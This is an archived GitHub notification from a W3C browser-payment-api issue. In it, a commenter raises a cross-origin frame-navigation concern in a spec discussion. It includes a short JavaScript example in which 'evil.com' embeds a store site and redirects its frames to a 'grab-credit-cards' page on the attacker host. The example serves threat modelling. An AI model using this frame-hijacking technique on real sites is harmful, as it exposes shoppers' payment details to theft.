- From: Mike West <notifications@github.com>
- Date: Thu, 17 Nov 2016 05:27:26 -0800
- To: w3c/browser-payment-api <browser-payment-api@noreply.github.com>
Received on Thursday, 17 November 2016 13:28:23 UTC
@rsolomakhin: Interesting. Do you account for the fact that frames are navigable cross-origin? That is, `evil.com` can do something like:

```
var target = document.createElement('iframe');
target.src = "https://amazing-store.com/";
target.onload = _ => {
  for (var i = 0; i < x.frames.length; i++) {
    target.frames[i].location.href = "https://evil.com/grab-credit-cards.html";
  }
};
```

--
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/w3c/browser-payment-api/issues/311#issuecomment-261245899